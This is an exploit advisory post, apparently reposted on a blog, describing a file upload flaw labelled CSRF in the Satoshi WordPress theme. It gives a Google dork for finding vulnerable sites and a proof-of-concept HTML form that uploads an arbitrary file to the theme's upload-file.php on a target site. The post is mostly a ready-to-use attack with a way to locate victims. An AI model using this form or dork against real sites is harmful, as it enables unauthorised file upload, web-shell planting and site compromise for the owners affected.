#- Title: Satoshi Theme - File Upload CSRF
#- Author: Cyber_Taregh
#- Date: 2014-12-06
#- Developer : vooshtheme
#- Link Download : wpthemedownload .org/satoshi/
#- Google Dork: inurl:"/Themes/satoshi/"
#- Fixed in Version : -
#- Tested on : linux
======================================================
Classification
Type CSRF
OWASP Top 10 A8: Cross-Site Request Forgery (CSRF)
CWE CWE-352
Miscellaneous
Submitter Anonymous
Views 750
Verified No
WPVDB ID 7709
-- Proof Of Concept --
When vuln : -
CSRF :
<form enctype="multipart/form-data"
action="http://target .com/wp-content/themes/satoshi/upload-file.php" method="post">
Your File: <input name="uploadfile" type="file" /><br />
<input type="submit" value="upload" />
</form>
If Succes : Succes
Tidak ada komentar:
Posting Komentar